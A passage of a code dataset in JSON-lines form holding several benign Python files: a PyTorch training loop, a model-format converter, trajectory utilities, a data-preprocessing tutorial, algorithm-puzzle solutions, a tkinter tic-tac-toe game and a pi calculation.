-1)\n\n\tcoord_mask = gt_coords.abs().sum(0) > 0\n\tif coord_mask.sum() > 0:\n\t\tgt_coords = gt_coords[:, coord_mask]\n\n\tmean += gt_coords.median(1)[0]\n\t\nmean /= len(trainset)\n\nprint(\"Done. 
Mean: %.2f, %.2f, %.2f\\n\" % (mean[0], mean[1], mean[2]))\n\n# create network\nnetwork = Network(mean)\nnetwork = network.cuda()\nnetwork.train()\n\noptimizer = optim.Adam(network.parameters(), lr=opt.learningrate)\n\niteration = 0\nepochs = int(opt.iterations / len(trainset))\n\n# keep track of training progress\ntrain_log = open('log_init_%s_%s.txt' % (opt.scene, opt.session), 'w', 1)\n\nfor epoch in range(epochs):\t\n\n\tprint(\"=== Epoch: %d ======================================\" % epoch)\n\n\tfor image, gt_pose, gt_coords, focal_length, file in trainset_loader:\n\n\t\tstart_time = time.time()\n\n\t\tgt_coords = gt_coords.cuda()\n\t\timage = image.cuda()\n\n\t\t# random shift as data augmentation\n\t\tpadX, padY, image = util.random_shift(image, network.OUTPUT_SUBSAMPLE / 2)\n\t\n\t\tprediction, neural_guidance = network(image) \n\t\t# neural guidance is ignored / not trained during initialization\n\n\t\tprediction = prediction.squeeze().view(3, -1)\n\t\tgt_coords = gt_coords.squeeze().view(3, -1)\n\n\t\t# mask out invalid coordinates (all zeros)\n\t\tcoords_mask = gt_coords.abs().sum(0) != 0 \n\n\t\tif coords_mask.sum() == 0:\n\t\t\tprint(\"Empty ground truth scene coordinates! Skip.\")\n\t\t\tcontinue\n\n\t\tprediction = prediction[:,coords_mask]\n\t\tgt_coords = gt_coords[:,coords_mask]\n\n\t\tloss = torch.norm(prediction - gt_coords, dim=0)\n\n\t\tloss_mask = loss < opt.hardclamp\n\t\tloss = loss[loss_mask]\n\n\t\t# soft clamping of loss for stability\n\t\tloss_l1 = loss[loss <= opt.softclamp]\n\t\tloss_sqrt = loss[loss > opt.softclamp]\n\t\tloss_sqrt = torch.sqrt(opt.softclamp * loss_sqrt)\n\n\t\trobust_loss = (loss_l1.sum() + loss_sqrt.sum()) / float(loss.size(0))\n\n\t\trobust_loss.backward()\t# calculate gradients (pytorch autograd)\n\t\toptimizer.step()\t\t# update all network parameters\n\t\toptimizer.zero_grad()\n\t\t\n\t\tprint('Iteration: %6d, Loss: %.1f, Time: %.2fs' % (iteration, robust_loss, time.time()-start_time), flush=True)\n\t\ttrain_log.write('%d %f\\n' % (iteration, robust_loss))\n\n\t\titeration = iteration + 1\n\n\tprint('Saving snapshot of the network to %s.' 
% opt.network)\n\ttorch.save(network.state_dict(), opt.network)\n\t\n\nprint('Done without errors.')\ntrain_log.close()\n","repo_name":"vislearn/ngdsac_camreloc","sub_path":"train_init.py","file_name":"train_init.py","file_ext":"py","file_size_in_byte":3863,"program_lang":"python","lang":"en","doc_type":"code","stars":46,"dataset":"github-code","pt":"78"} +{"seq_id":"38476365872","text":"import torch\nfrom safetensors.torch import save_file\n\nMODEL_NAME = './RWKV-4-Pile-430M-20220808-8066'\n\ndef main():\n    input = f'{MODEL_NAME}.pth'\n    output = f'{MODEL_NAME}.safetensors'\n    print(f'* Loading with Torch: {input}')\n    model = torch.load(input, map_location = 'cpu')\n    print(f'* Saving with SafeTensors: {output}')\n    save_file(model, output)\n    print('* Done.')\n\nif __name__ == '__main__':\n    main()\n","repo_name":"KerfuffleV2/smolrsrwkv","sub_path":"utils/pth_to_safetensors.py","file_name":"pth_to_safetensors.py","file_ext":"py","file_size_in_byte":435,"program_lang":"python","lang":"en","doc_type":"code","stars":84,"dataset":"github-code","pt":"78"} +{"seq_id":"2706612731","text":"import os.path\nfrom datetime import datetime, timedelta\nfrom common.spatial_func import distance, SPoint\nfrom common.mbr import MBR\nfrom map_matching.candidate_point import CandidatePoint\nfrom common.spatial_func import cal_loc_along_line\nimport pandas as pd\n\n\nclass STPoint(SPoint):\n    def __init__(self, lat, lng, time, data=None):\n        super(STPoint, self).__init__(lat, lng)\n        self.time = time\n        self.data = data\n\n    def __str__(self):\n        return '({}, {}, {}, {})'.format(self.time.strftime('%Y/%m/%d %H:%M:%S'), self.lat, self.lng, self.data)\n\n\nclass Trajectory:\n    def __init__(self, oid, pid, pt_list):\n        self.oid = oid\n        self.pid = pid\n        self.pt_list = pt_list\n\n    def get_duration(self):\n        return (self.pt_list[-1].time - self.pt_list[0].time).total_seconds()\n\n    def get_length(self):\n        if len(self.pt_list) <= 1:\n            return 0.0\n        else:\n            dist = 0.0\n            pre_pt = None\n            for pt in self.pt_list:\n                if pre_pt is None:\n                    pre_pt = pt\n                else:\n                    tmp_dist = distance(pre_pt, pt)\n                    dist += tmp_dist\n                    pre_pt = pt\n            return dist\n\n    def get_time_interval(self):\n        point_time_interval = []\n        for pre, cur in zip(self.pt_list[:-1], self.pt_list[1:]):\n            point_time_interval.append((cur.time - pre.time).total_seconds())\n        return sum(point_time_interval) / len(point_time_interval)\n\n    def get_distance_interval(self):\n        point_dist_interval = []\n        for pre, cur in zip(self.pt_list[:-1], self.pt_list[1:]):\n            point_dist_interval.append(distance(pre, cur))\n        return sum(point_dist_interval) / len(point_dist_interval)\n\n    def get_mbr(self):\n        return MBR.cal_mbr(self.pt_list)\n\n    def get_start_time(self):\n        return self.pt_list[0].time\n\n    def get_end_time(self):\n        return self.pt_list[-1].time\n\n    def get_mid_time(self):\n        return self.pt_list[0].time + (self.pt_list[-1].time - self.pt_list[0].time) / 2.0\n\n    def get_centroid(self):\n        mean_lat = 0.0\n        mean_lng = 0.0\n        for pt in self.pt_list:\n            mean_lat += pt.lat\n            mean_lng += pt.lng\n        mean_lat /= len(self.pt_list)\n        mean_lng /= len(self.pt_list)\n        return SPoint(mean_lat, mean_lng)\n\n    def query_trajectory_by_temporal_range(self, start_time, end_time):\n        # start_time <= pt.time < end_time\n        traj_start_time = self.get_start_time()\n        traj_end_time = self.get_end_time()\n        if start_time > traj_end_time:\n            return None\n        if end_time <= traj_start_time:\n            return None\n        st = max(traj_start_time, start_time)\n        et = min(traj_end_time + timedelta(seconds=1), end_time)\n        start_idx = 
self.binary_search_idx(st) # pt_list[start_idx].time <= st < pt_list[start_idx+1].time\n        if self.pt_list[start_idx].time < st:\n            # then the start_idx is out of the range, we need to increase it\n            start_idx += 1\n        end_idx = self.binary_search_idx(et) # pt_list[end_idx].time <= et < pt_list[end_idx+1].time\n        if self.pt_list[end_idx].time < et:\n            # then the end_idx is acceptable\n            end_idx += 1\n        sub_pt_list = self.pt_list[start_idx:end_idx]\n        return Trajectory(self.oid, self.pid, sub_pt_list)\n\n    def binary_search_idx(self, time):\n        # self.pt_list[idx].time <= time < self.pt_list[idx+1].time\n        # if time < self.pt_list[0].time, return -1\n        # if time >= self.pt_list[len(self.pt_list)-1].time, return len(self.pt_list)-1\n        nb_pts = len(self.pt_list)\n        if time < self.pt_list[0].time:\n            return -1\n        if time >= self.pt_list[-1].time:\n            return nb_pts - 1\n        # the time is in the middle\n        left_idx = 0\n        right_idx = nb_pts - 1\n        while left_idx <= right_idx:\n            mid_idx = int((left_idx + right_idx) / 2)\n            if mid_idx < nb_pts - 1 and self.pt_list[mid_idx].time <= time < self.pt_list[mid_idx + 1].time:\n                return mid_idx\n            elif self.pt_list[mid_idx].time < time:\n                left_idx = mid_idx + 1\n            else:\n                right_idx = mid_idx - 1\n\n    def query_location_by_timestamp(self, time):\n        idx = self.binary_search_idx(time)\n        if idx == -1 or idx == len(self.pt_list) - 1:\n            return None\n        if self.pt_list[idx].time == time or (self.pt_list[idx+1].time - self.pt_list[idx].time).total_seconds() == 0:\n            return SPoint(self.pt_list[idx].lat, self.pt_list[idx].lng)\n        else:\n            # interpolate location\n            dist_ab = distance(self.pt_list[idx], self.pt_list[idx+1])\n            if dist_ab == 0:\n                return SPoint(self.pt_list[idx].lat, self.pt_list[idx].lng)\n            dist_traveled = dist_ab * (time - self.pt_list[idx].time).total_seconds() / \\\n                            (self.pt_list[idx+1].time - self.pt_list[idx].time).total_seconds()\n            return cal_loc_along_line(self.pt_list[idx], self.pt_list[idx+1], dist_traveled / dist_ab)\n\n    def to_wkt(self):\n        wkt = 'LINESTRING ('\n        for pt in self.pt_list:\n            wkt += '{} {}, '.format(pt.lng, pt.lat)\n        wkt = wkt[:-2] + ')'\n        return wkt\n\n    def __hash__(self):\n        return hash(self.pid + '_' + self.pt_list[0].time.strftime('%Y%m%d%H%M%S') + '_' +\n                    self.pt_list[-1].time.strftime('%Y%m%d%H%M%S'))\n\n    def __eq__(self, other):\n        return hash(self) == hash(other)\n\n    def __repr__(self):\n        return f'Trajectory(pid={self.pid})'\n\n\ndef get_tid(oid, pt_list):\n    return oid + '_' + pt_list[0].time.strftime('%Y%m%d%H%M%S') + '_' + pt_list[-1].time.strftime('%Y%m%d%H%M%S')\n\n\ndef traj_point_dist(traj, pt, method='centroid'):\n    if method == 'nearest':\n        dists = []\n        for t_pt in traj.pt_list:\n            dists.append(distance(t_pt, pt))\n        return min(dists)\n    elif method == 'centroid':\n        return distance(pt, traj.get_centroid())\n\n\ndef parse_traj_file(input_path, traj_type='raw', extra_fields=None):\n    assert traj_type in ['raw', 'mm'], 'only `raw` or `mm` is supported'\n\n    time_format = '%Y-%m-%d %H:%M:%S'\n    df = pd.read_csv(input_path)\n    pid = df['plan_no'].values[0]\n    oid = pid\n    trajs = []\n    pt_list = []\n    for index, value in df.iterrows():\n        lat = float(value['latitude'])\n        lng = float(value['longitude'])\n        pt = STPoint(lat, lng, datetime.strptime(value['start_stay'], time_format), None)\n        pt_list.append(pt)\n    if len(pt_list) != 0:\n        traj = Trajectory(oid, pid, pt_list)\n        trajs.append(traj)\n    return trajs\n\n\ndef store_traj_file(trajs, target_path, target_path_path, filename, traj_type='raw'):\n    assert traj_type in ['raw', 'mm'], 'only `raw` or `mm` is supported'\n\n    time_format = 
'%Y-%m-%d %H:%M:%S'\n    data = []\n    for traj, path in trajs:\n        pt_list = traj.pt_list\n        for pt in pt_list:\n            candi_pt = pt.data['candi_pt']\n            if candi_pt is not None:\n                data.append([pt.time.strftime(time_format), pt.lat, pt.lng, candi_pt.eid, candi_pt.lat, candi_pt.lng,\n                             candi_pt.error, candi_pt.offset])\n            else:\n                data.append([pt.time.strftime(time_format), pt.lat, pt.lng, None, None, None, None, None])\n    df = pd.DataFrame(data=data, columns=['timestamp', 'latitude', 'longitude', 'eid', 'candi_pt_lat',\n                                          'candi_pt_lon', 'candi_pt_error', 'candi_pt_offset'])\n    df.to_csv(target_path, index=False)\n\n\n    for index, p in enumerate(path):\n        p_data = []\n        for p_entity in p.path_entities:\n            p_data.append([p_entity.eid, str(p_entity.enter_time), str(p_entity.leave_time)])\n        df_path = pd.DataFrame(data=p_data, columns=['eid', 'enter_time', 'leave_time'])\n        tmp_filename = str(index)+'_'+filename\n        df_path.to_csv(os.path.join(target_path_path, tmp_filename), index=False)\n","repo_name":"too2/DLInfMA_Refactoring","sub_path":"tptk/common/trajectory.py","file_name":"trajectory.py","file_ext":"py","file_size_in_byte":8124,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"8136563338","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Jul 12 09:35:53 2019\n\n2 sütundan oluşan bir veri seti düşünelim. 1. sütun [1-10] arasında değerler alırken , 2. sütun [1-10000] arasında değerler alsın. \nAğırlık (weight) 2.sütundaki hatalar daha büyük olacağından bu sütuna göre optimize edilecek ve algoritma daha fazla sürede işlemi tamamlayacaktır. \nBu ise egitimde sapma yapacaktir.\nBunu engellemek icin StandardScaler kullanilir.\nStandardScaler -> Ortalama ve birim varyansi kullanarak ölçeklendirme özelliklerini standartlaştırır.\n\"\"\"\n# 1-kutuphaneler\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n# 2- veri on isleme\n\n# 2.1- veri yukleme\nveriler = pd.read_csv('veriler.csv')\neksikveriler = pd.read_csv('eksik_veriler.csv')\n\n\n# veri on isleme\nboy = veriler[['boy']]\nprint (boy)\n\nboykilo = veriler[['boy','kilo']]\nprint(boykilo)\n\n\n# eksik veriler icin \nfrom sklearn.preprocessing import Imputer \n\nimputer = Imputer(missing_values=\"NaN\",strategy = \"mean\",axis=0)\n\nYasboykilo = eksikveriler.iloc[:,1:4].values # yalnizca sayisal olan kolonlar alinir [satir:satir,kolon:kolon]\nprint(Yasboykilo)\nimputer = imputer.fit(Yasboykilo[:,1:4]) # her kolon icin ort hesapla\nYasboykilo[:,1:4] = imputer.transform(Yasboykilo[:,1:4]) # parametre degisikligini uygula\nprint(Yasboykilo)\n\n\n# encoder : Kategoric -> Numeric\n\nulke = veriler.iloc[:,0:1].values\nprint(ulke)\n\nfrom sklearn.preprocessing import LabelEncoder\nlb = LabelEncoder() \nulke[:,0] = lb.fit_transform(ulke[:,0])\nprint(ulke)\n\nfrom sklearn.preprocessing import OneHotEncoder\nulke = veriler.iloc[:,0:1].values\nohe = OneHotEncoder(categorical_features = \"all\")\nulke= ohe.fit_transform(ulke[:,0:1]).toarray() # nominal degerlerden kolon bazli degerler olusturuldu\nprint(ulke)\n\n# print(list(range(22))) 0-21 sayilari verir\n\n# numpy dizileri dataframe donusumu\nsonuc = pd.DataFrame(data = ulke, index = range(22), columns = ['fr','tr','us']) # OneHotEncoder verilerinden dataframe olusturulur\nprint (sonuc)\n\nsonuc2 = pd.DataFrame(data = Yasboykilo, index = range(22), columns = ['boy','kilo','yas'])\nprint(sonuc2)\n\ncinsiyet = veriler.iloc[:,-1:].values\n\nprint(cinsiyet)\nsonuc3 = pd.DataFrame(data = cinsiyet, index=range(22),columns = 
['cinsiyet'])\nprint(sonuc3)\n\n\n# concat ile dataframe birlestirme\ns = pd.concat([sonuc,sonuc2],axis = 1)\nprint(s)\n\ns2 = pd.concat([s,sonuc3],axis =1)\nprint(s2)\n\n\n# amac train ile boyyaskilo yu iceren df (s) ile egitmek ve sonuc3 df'mini bulmasini istiyoruz\n# sklearn.cross_validation da kullanilan train_test_split, sklearn.model_selection 'a tasinmis\n\nfrom sklearn.model_selection import train_test_split\nx_train, x_test, y_train, y_test = train_test_split(s,sonuc3,test_size = 0.33, random_state = 0) # s ve sonuc3 df mi parcalanmali\n# literaturde test icin 1/3 iken train icin 2/3 kullanilir\n\n# verilerin olceklenmesi\nfrom sklearn.preprocessing import StandardScaler\n\nsc = StandardScaler()\nX_train = sc.fit_transform(x_train)\nX_test = sc.fit_transform(x_test)\n\n\n\n\n\n\n\n\n\n","repo_name":"fbasatemur/Machine_Learning","sub_path":"Machine Learning/01- Veri On Isleme (Data Preprocessing)/tutorial13-oznitelik olcekleme.py","file_name":"tutorial13-oznitelik olcekleme.py","file_ext":"py","file_size_in_byte":3031,"program_lang":"python","lang":"tr","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"5688157755","text":"# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, val=0, left=None, right=None):\n# self.val = val\n# self.left = left\n# self.right = right\nclass Solution:\n def isValidBST(self, root: Optional[TreeNode]) -> bool:\n if not root:\n return True\n \n if not self.check(root.right, root.val, True) or not self.check(root.left, root.val, False):\n return False\n \n return self.isValidBST(root.right) and self.isValidBST(root.left)\n\n def check(self, node, val, greater):\n if not node:\n return True\n\n if greater and node.val <= val:\n return False\n if not greater and node.val >= val:\n return False\n \n return self.check(node.left, val, greater) and self.check(node.right, val, greater)","repo_name":"raymond212/leetcode-solutions","sub_path":"python/0098_Validate_Binary_Search_Tree.py","file_name":"0098_Validate_Binary_Search_Tree.py","file_ext":"py","file_size_in_byte":853,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"78"} +{"seq_id":"27856888784","text":"# https://programmers.co.kr/learn/courses/30/lessons/12899\n\ndef solution(n): # 3진수 구하는 문제와 비슷\n if n <= 3:\n return \"124\"[n - 1]\n else:\n q, r = divmod(n - 1, 3) # 3진법에는 0이없기때문에 divmod(n - 1)을 함\n return solution(q) + \"124\"[r]\n\n\nprint(solution(7))\n","repo_name":"thecode00/Algorithm-Problem-Solve","sub_path":"Programmers/Python/Level 2/124 나라의 숫자/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":319,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"6129766981","text":"import tkinter as tk\r\nfrom tkinter import*\r\n\r\n\r\n\r\n\r\ngame = tk.Tk()\r\ngame.resizable(False, False)\r\ngame.title(\"Tic tac toe\")\r\ngame.iconbitmap(\"test.ico\")\r\n\r\nmenubar = Menu(game)\r\n\r\nmenu1 = Menu(menubar, tearoff=0)\r\nmenu1.add_command(label=\"Jouer contre un autre joueur\")\r\nmenu1.add_command(label=\"Jouer contre l'ordinateur\")\r\nmenu1.add_command(label=\"Niveau de l'ordinateur\")\r\nmenu1.add_command(label=\"Recommencer\")\r\nmenu1.add_separator()\r\nmenu1.add_command(label=\"Quitter\", command=game.quit)\r\nmenubar.add_cascade(label=\"Options\", menu=menu1)\r\n\r\nmenu2 = Menu(menubar, tearoff=0)\r\nmenu2.add_command(label=\"Score\")\r\nmenu2.add_command(label=\"Historique\")\r\nmenu2.add_command(label=\"Tic Tac Toe Premium 
à seulement 24€99 par mois\")\r\nmenubar.add_cascade(label=\"Historique\", menu=menu2)\r\n\r\nmenu3 = Menu(menubar, tearoff=0)\r\nmenu3.add_command(label=\"Règles du jeu\")\r\nmenubar.add_cascade(label=\"Aide\", menu=menu3)\r\n\r\ngame.config(menu=menubar)\r\ntk.Label(game, text=\"Tic Tac Toe\", font=('Ariel', 25)).pack()\r\nstatus_label = tk.Label(game, text=\"Au tour de X\", font=('Ariel', 15), bg='grey', fg='ivory')\r\nstatus_label.pack(fill=tk.X)\r\n\r\ndef play_again():\r\n    print(\"here we go!\")\r\n    status_label.configure(text=\"Au tour du joueur X\", bg='blue', fg='ivory')\r\n    global player\r\n    global checklist\r\n    global XO_list\r\n    player = 'X'\r\n    \r\n    button0.configure(state= NORMAL, text=\"\", bg='grey')\r\n    button1.configure(state= NORMAL, text=\"\", bg='grey')\r\n    button2.configure(state= NORMAL, text=\"\", bg='grey')\r\n    button3.configure(state= NORMAL, text=\"\", bg='grey')\r\n    button4.configure(state= NORMAL, text=\"\", bg='grey')\r\n    button5.configure(state= NORMAL, text=\"\", bg='grey')\r\n    button6.configure(state= NORMAL, text=\"\", bg='grey')\r\n    button7.configure(state= NORMAL, text=\"\", bg='grey')\r\n    button8.configure(state= NORMAL, text=\"\", bg='grey')\r\n    checklist = [\"0\", \"1\", \"2\", \"3\", \"4\", \"5\", \"6\", \"7\", \"8\"]\r\n    XO_list = []\r\n    buttonReset.pack_forget()\r\nbuttonReset = tk.Button(game, text='Rejouer ?', font=('Ariel', 15),bg='yellow', width=8, height=4, command=play_again)\r\n    \r\n\r\nplayer = \"X\"\r\ncomputer = 0\r\nglobal pos\r\nX_list = [\"0\", \"1\", \"2\", \"3\", \"4\", \"5\", \"6\", \"7\", \"8\"]\r\nO_list = [\"0\", \"1\", \"2\", \"3\", \"4\", \"5\", \"6\", \"7\", \"8\"]\r\nXO_list = []\r\nAI_list = []\r\nchecklist = [\"0\", \"1\", \"2\", \"3\", \"4\", \"5\", \"6\", \"7\", \"8\"]\r\nchecklist2 = [0, 0, 0, 0, 0, 0, 0, 0, 0]\r\n\r\ngame.geometry(\"500x500\")\r\n\r\ncondition = False\r\ncondition2 = False\r\ndef check_win():\r\n    if condition==True:\r\n        print(\"game over!\")\r\n    else:\r\n        print(\"continue\")\r\n\r\ndef check_win2():\r\n    if condition2==True:\r\n        print(\"game over!\")\r\n    else:\r\n        print(\"continue\")\r\n    \r\ndef test_condition():\r\n    global condition, condition2\r\n    if (checklist[0] == checklist[1] == checklist[2] == \"X\" or\r\n        checklist[3] == checklist[4] == checklist[5] == \"X\" or\r\n        checklist[6] == checklist[7] == checklist[8] == \"X\" or\r\n        checklist[0] == checklist[3] == checklist[6] == \"X\" or\r\n        checklist[1] == checklist[4] == checklist[7] == \"X\" or\r\n        checklist[2] == checklist[5] == checklist[8] == \"X\" or\r\n        checklist[0] == checklist[4] == checklist[8] == \"X\" or\r\n        checklist[2] == checklist[4] == checklist[6] == \"X\"):\r\n        condition = True\r\n        print (\"game over, X a gagné!\")\r\n        status_label.configure(text=\"X a gagné !\", bg='blue')\r\n        reset()\r\n    elif (checklist[0] == checklist[1] == checklist[2] == \"O\" or\r\n        checklist[3] == checklist[4] == checklist[5] == \"O\" or\r\n        checklist[6] == checklist[7] == checklist[8] == \"O\" or\r\n        checklist[0] == checklist[3] == checklist[6] == \"O\" or\r\n        checklist[1] == checklist[4] == checklist[7] == \"O\" or\r\n        checklist[2] == checklist[5] == checklist[8] == \"O\" or\r\n        checklist[0] == checklist[4] == checklist[8] == \"O\" or\r\n        checklist[2] == checklist[4] == checklist[6] == \"O\"):\r\n        condition = True\r\n        print (\"game over, O a gagné!\")\r\n        status_label.configure(text=\"O a gagné!\", bg='red')\r\n        reset()\r\n    elif len(XO_list)==9:\r\n        print(\"égalité!\")\r\n        status_label.configure(text=\"Egalité !\", bg='green')\r\n        reset()\r\n\r\n    \r\n    if (checklist2[0] == checklist2[1] == 
checklist2[2] == 1 or\r\n        checklist2[3] == checklist2[4] == checklist2[5] == 1 or\r\n        checklist2[6] == checklist2[7] == checklist2[8] == 1 or\r\n        checklist2[0] == checklist2[3] == checklist2[6] == 1 or\r\n        checklist2[1] == checklist2[4] == checklist2[7] == 1 or\r\n        checklist2[2] == checklist2[5] == checklist2[8] == 1 or\r\n        checklist2[0] == checklist2[4] == checklist2[8] == 1 or\r\n        checklist2[2] == checklist2[4] == checklist2[6] == 1 ):\r\n        condition2 = True\r\n        \r\n    \r\n    \r\ndef symbol_player():\r\n    global player\r\n    \r\n    if player == 'X':\r\n        \r\n        XO_list.append('X')\r\n        print(XO_list)\r\n        print(checklist)\r\n        print(checklist2)\r\n        player = \"O\"\r\n        status_label.configure(text=\"Au tour du joueur O\", bg='red', fg='ivory')\r\n    elif player == \"O\":\r\n        \r\n        XO_list.append('O')\r\n        print(XO_list)\r\n        print(checklist)\r\n        player = \"X\"\r\n        status_label.configure(text=\"Au tour du joueur X\", bg='blue', fg='ivory')\r\ncheck_win()\r\ncheck_win2()\r\n\r\n\r\ndef click0():\r\n    print(\"0\")\r\n    button0.configure(bg=\"ivory\", text = player, fg = 'black',state= DISABLED)\r\n    checklist[0] = player\r\n    checklist2[0] = 1\r\n    \r\n    \r\n\r\ndef click1():\r\n    print(\"1\")\r\n    button1.configure(bg=\"ivory\", text = player,fg = 'black',state= DISABLED)\r\n    checklist[1] = player\r\n    checklist2[1] = 1\r\n    \r\n\r\n\r\ndef click2():\r\n    print(\"2\")\r\n    button2.configure(bg=\"ivory\", text = player, fg = 'black',state= DISABLED)\r\n    checklist[2] = player\r\n    checklist2[2] = 1\r\n    \r\n\r\ndef click3():\r\n    print(\"3\")\r\n    button3.configure(bg=\"ivory\", text = player, fg = 'black',state= DISABLED)\r\n    checklist[3] = player\r\n    checklist2[3] = 1\r\n    \r\n\r\ndef click4():\r\n    print(\"4\")\r\n    button4.configure(bg=\"ivory\", text = player, fg = 'black',state= DISABLED)\r\n    checklist[4] = player\r\n    checklist2[4] = 1\r\n    \r\n\r\ndef click5():\r\n    print(\"5\")\r\n    button5.configure(bg=\"ivory\", text = player, fg = 'black',state= DISABLED)\r\n    checklist[5] = player\r\n    checklist2[5] = 1\r\n    \r\n\r\ndef click6():\r\n    print(\"6\")\r\n    button6.configure(bg=\"ivory\", text = player, fg = 'black',state= DISABLED)\r\n    checklist[6] = player\r\n    checklist2[6] = 1\r\n    \r\n\r\ndef click7():\r\n    print(\"7\")\r\n    button7.configure(bg=\"ivory\", text = player, fg = 'black',state= DISABLED)\r\n    checklist[7] = player\r\n    checklist2[7] = 1\r\n    \r\n\r\ndef click8():\r\n    print(\"8\")\r\n    button8.configure(bg=\"ivory\", text = player, fg = 'black',state= DISABLED)\r\n    checklist[8] = player\r\n    checklist2[8] = 1\r\n    \r\n    \r\ndef set(self):\r\n    print('ok')\r\n    \r\n\r\n\r\nbutton0 = tk.Button(game, text =\"\", bg='grey', width=10, height=5, command=lambda:[click0(),symbol_player(), test_condition()])\r\nbutton0.place(x=100, y=100)\r\n\r\nbutton1 = tk.Button(game, text =\"\",bg='grey', width=10, height=5,command=lambda:[click1(),symbol_player(), test_condition()])\r\nbutton1.place(x=200, y=100)\r\n\r\nbutton2 = tk.Button(game, text =\"\",bg='grey', width=10, height=5, command=lambda:[click2(),symbol_player(), test_condition()])\r\nbutton2.place(x=300, y=100)\r\n\r\nbutton3 = tk.Button(game, text =\"\",bg='grey', width=10, height=5, command=lambda:[click3(),symbol_player(), test_condition()])\r\nbutton3.place(x=100, y=200)\r\n\r\nbutton4 = tk.Button(game, text =\"\",bg='grey', width=10, height=5,command=lambda:[click4(),symbol_player(), test_condition()])\r\nbutton4.place(x=200, y=200)\r\n\r\nbutton5 = tk.Button(game, text =\"\",bg='grey', width=10, height=5, command=lambda:[click5(),symbol_player(), 
test_condition()])\r\nbutton5.place(x=300, y=200)\r\n\r\nbutton6 = tk.Button(game, text =\"\",bg='grey', width=10, height=5, command=lambda:[click6(),symbol_player(), test_condition()])\r\nbutton6.place(x=100, y=300)\r\n\r\nbutton7 = tk.Button(game, text =\"\",bg='grey', width=10, height=5, command=lambda:[click7(),symbol_player(), test_condition()])\r\nbutton7.place(x=200, y=300)\r\n\r\nbutton8 = tk.Button(game, text =\"\",bg='grey', width=10, height=5, command=lambda:[click8(),symbol_player(), test_condition()])\r\nbutton8.place(x=300, y=300)\r\n\r\n\r\n\r\ndef reset():\r\n    \r\n    global buttonReset\r\n    print(\"Jouer encore ?\")\r\n    buttonReset.pack()\r\n    buttonReset.place(x=200, y=400)\r\n    \r\n    \r\n    \r\ngame.mainloop()","repo_name":"driss-khelfi/tic-tac-toe","sub_path":"tictactoe03.py","file_name":"tictactoe03.py","file_ext":"py","file_size_in_byte":8057,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"38885617088","text":"#krb factorial\nimport math\n\t\t\ndef\tiFactorial(n):\n\t''' computes factorial using iteration - no parameter checking'''\n\tf = 1\n\tfor i in range(n+1):\n\t\tif(i>0):\n\t\t\tf = f * i\n\treturn f\t\n\t\t\n\n\ndef compute_term(k):\n\t''' computes summation term of ramanujan's infinite series'''\n\tnm = float(iFactorial(4*k)) * (1103.0 + 26390.0 * k)\n\tdn = (float(iFactorial(k)) ** 4) * (396.0 **(4 * k))\n\treturn nm/dn\n\t\ndef compute_pi():\n\tk = 0\n\ts = 0.0\n\tt = compute_term(k)\n\twhile t > 1e-15:\n\t\ts = s + t\n\t\tk = k + 1\n\t\tt = compute_term(k)\n\tpi = ((2.0 * math.sqrt(2.0))/9801.0) * s\n\treturn 1/pi\n\t\t\nprint(\"pi = \" , compute_pi(),math.pi)\n\t\n","repo_name":"kbergerstock/myProjects","sub_path":"projects.python/thinkCSpy.examples/compute_pi.py","file_name":"compute_pi.py","file_ext":"py","file_size_in_byte":609,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"22961823152","text":"\"\"\"\nhttps://leetcode.com/problems/maximal-square/\n\nGiven an m x n binary matrix filled with 0's and 1's, \nfind the largest square containing only 1's and return its area.\n\nExample 1:\nInput: matrix = [\n    [\"1\",\"0\",\"1\",\"0\",\"0\"],\n    [\"1\",\"0\",\"1\",\"1\",\"1\"],\n    [\"1\",\"1\",\"1\",\"1\",\"1\"],\n    [\"1\",\"0\",\"0\",\"1\",\"0\"]\n]\nOutput: 4\n\nExample 2:\nInput: matrix = [[\"0\",\"1\"],[\"1\",\"0\"]]\nOutput: 1\n\nExample 3:\nInput: matrix = [[\"0\"]]\nOutput: 0\n\nConstraints:\nm == matrix.length\nn == matrix[i].length\n1 <= m, n <= 300\nmatrix[i][j] is '0' or '1'.\n\"\"\"\nfrom typing import List\nfrom copy import deepcopy\nfrom functools import lru_cache\n\n\ndef print_matrix(mat):\n    print()\n    for row in mat:\n        print(\"  \" + \" \".join(f\"{v:>3}\" for v in row))\n    print()\n\n\ndef brute_force(matrix: List[List[int]]) -> int:\n    # Time complexity: O(m²n²)\n    # Space complexity: O(1)\n    pass\n\n\ndef dp_memoization(matrix: List[List[int]]) -> int:\n    # Dynamic programming - Memoization\n    # Time complexity: O(mn)\n    # Space complexity: O(mn)\n\n    @lru_cache(maxsize=None)\n    def dfs(r: int, c: int) -> int:\n        if r == rows or c == cols or matrix[r][c] == 0:\n            return 0\n        return 1 + min(dfs(r + 1, c), dfs(r, c + 1), dfs(r + 1, c + 1))\n\n    rows, cols = len(matrix), len(matrix[0])\n    max_side = 0\n    for r in range(rows):\n        for c in range(cols):\n            current = dfs(r, c)\n            if current > max_side:\n                max_side = current\n\n    return max_side * max_side\n\n\ndef dp_tabulation(matrix: List[List[int]]) -> int:\n    # Dynamic programming - Tabulation\n    # Time 
